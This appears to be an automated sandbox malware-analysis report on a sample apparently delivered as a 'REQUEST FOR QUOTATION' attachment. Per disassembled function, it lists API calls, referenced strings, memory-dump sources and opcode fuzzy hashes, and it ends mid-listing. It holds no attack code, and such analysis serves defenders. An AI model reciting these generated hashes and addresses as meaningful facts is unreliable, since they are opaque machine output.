                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00487580
                                                                                                                                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00487594
                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                                                                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                                                                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                              • String ID: static
                                                                                                                                                                                                                              • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                              • Opcode ID: deb04c372c4f7f58effd7c9f9f8f8c3622686de60ace0c164addb78cb82c2ccd
                                                                                                                                                                                                                              • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: deb04c372c4f7f58effd7c9f9f8f8c3622686de60ace0c164addb78cb82c2ccd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00426E3E
                                                                                                                                                                                                                                • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                                                                                              • __gmtime64_s.LIBCMT ref: 00426ED7
                                                                                                                                                                                                                              • __gmtime64_s.LIBCMT ref: 00426F0D
                                                                                                                                                                                                                              • __gmtime64_s.LIBCMT ref: 00426F2A
                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 00426F80
                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 00426FB3
                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 00426FE8
                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                                                                                                                                                                                                                              • __invoke_watson.LIBCMT ref: 00427077
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 384356119-0
                                                                                                                                                                                                                              • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                                                                                                                              • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00462542
                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 004625EB
                                                                                                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 0046262F
                                                                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                                                                                                                                                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                                                                                                                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 004626BA
                                                                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4176008265-0
                                                                                                                                                                                                                              • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                                                                                                                                                                              • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00486FDD
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 830647256-0
                                                                                                                                                                                                                              • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                                                                                                                                                                              • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                                                                                                                                                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00456C2A
                                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                                                                                                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                                                                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00456CC6
                                                                                                                                                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                                                                                                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00456CEE
                                                                                                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2706829360-0
                                                                                                                                                                                                                              • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                                                                                                                                                                              • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                                                                                              • CoInitialize.OLE32 ref: 00478403
                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 0047840E
                                                                                                                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                                                                                                                                                                                                                              • IIDFromString.OLE32(?,?), ref: 004784E1
                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0047857B
                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004785DC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                              • API String ID: 834269672-1287834457
                                                                                                                                                                                                                              • Opcode ID: bddeeabf73b366b14407c3e71f23e64711764d0829d4ad9168793951bdc54c34
                                                                                                                                                                                                                              • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bddeeabf73b366b14407c3e71f23e64711764d0829d4ad9168793951bdc54c34
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                                                                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0046B550
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                              • API String ID: 4194297153-14809454
                                                                                                                                                                                                                              • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                                                                                                                                                                              • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                                                                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 0045901F
                                                                                                                                                                                                                              • GetParent.USER32 ref: 0045903B
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                                                                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 00459047
                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 00459063
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                              • API String ID: 1536045017-1403004172
                                                                                                                                                                                                                              • Opcode ID: e527cb334e7d7689371befb81d6d0d32f7406071002c3aa4a78959359ae4abf1
                                                                                                                                                                                                                              • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e527cb334e7d7689371befb81d6d0d32f7406071002c3aa4a78959359ae4abf1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                                                                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 00459108
                                                                                                                                                                                                                              • GetParent.USER32 ref: 00459124
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                                                                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 00459130
                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 0045914C
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                              • API String ID: 1536045017-1403004172
                                                                                                                                                                                                                              • Opcode ID: 788820521d6cad1a15555ef376c01a576536d52651f0e806491d71d2e8ddf36c
                                                                                                                                                                                                                              • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 788820521d6cad1a15555ef376c01a576536d52651f0e806491d71d2e8ddf36c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetParent.USER32 ref: 0045916F
                                                                                                                                                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 00459196
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                              • API String ID: 1704125052-3381328864
                                                                                                                                                                                                                              • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                                                                                                                                                                              • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004611F0
